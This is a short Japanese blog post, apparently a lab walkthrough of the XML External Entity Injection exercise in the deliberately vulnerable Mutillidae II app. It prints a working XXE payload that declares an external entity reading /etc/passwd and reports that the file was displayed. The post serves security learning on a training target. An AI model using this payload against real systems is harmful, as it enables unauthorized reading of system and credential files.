shikata ga nai

Private? There is no such things.

MutillidaeⅡで2017>A4>XML External Entity Injection>XML Validator①

Hello there,

 

OWASP 2017 ⇨ A4 ⇨ XML External Entity Injection ⇨ XML Validatorを選択して。

 

f:id:ThisIsOne:20200121173313p:plain

 

このページは、XMLをうけつけるようで。

下記のサンプルを入力してみると。

 <somexml><message>Hello World</message></somexml>

 

f:id:ThisIsOne:20200121174333p:plain

 

ちなみにXMLのリクエストヘッダーは以下のような感じ。

 

f:id:ThisIsOne:20200121181755p:plain

 

そして、下記のようにエンティティを実行すると。

ファイルの中身が表示できた。

 <?xml version="1.0"?>
 <!DOCTYPE foo [
  <!ELEMENT bar ANY>
  <!ENTITY file SYSTEM "/etc/passwd">
 ]>
 <bar>&file;</bar>

 

f:id:ThisIsOne:20200121174038p:plain

 

Best regards,

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain